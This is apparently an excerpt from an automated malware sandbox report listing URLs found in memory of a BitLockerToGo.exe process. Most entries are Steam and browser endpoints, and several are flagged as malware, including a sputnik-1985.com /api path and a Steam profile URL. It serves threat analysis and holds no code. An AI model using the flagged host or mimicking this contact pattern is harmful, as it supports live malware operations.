                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englBitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://s.ytimg.com;BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://steambroadcast-test.akamaizedBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steam.tv/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://store.steampowerBitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://sketchfab.comBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.youtube.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_ABitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://sputnik-1985.com/BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2385447737.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384397075.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383919449.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383640703.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://login.sbZBitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://community.fastly.steamstatic.com~TBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/recaptcha/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://checkout.steampowered.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sputnik-1985.com/U70BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://store.steampowered.com/;BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://cdn.fastly.steamFTBitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://checkout.steampownZBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://api.steATBitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=enBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://sketchfab.0ZBitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://help.st~ZBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://store.steampowered.com/stats/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://medal.tvBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://x1.c.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://x1.i.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://sputnik-1985.com:443/apiBitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://login.steampowered.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
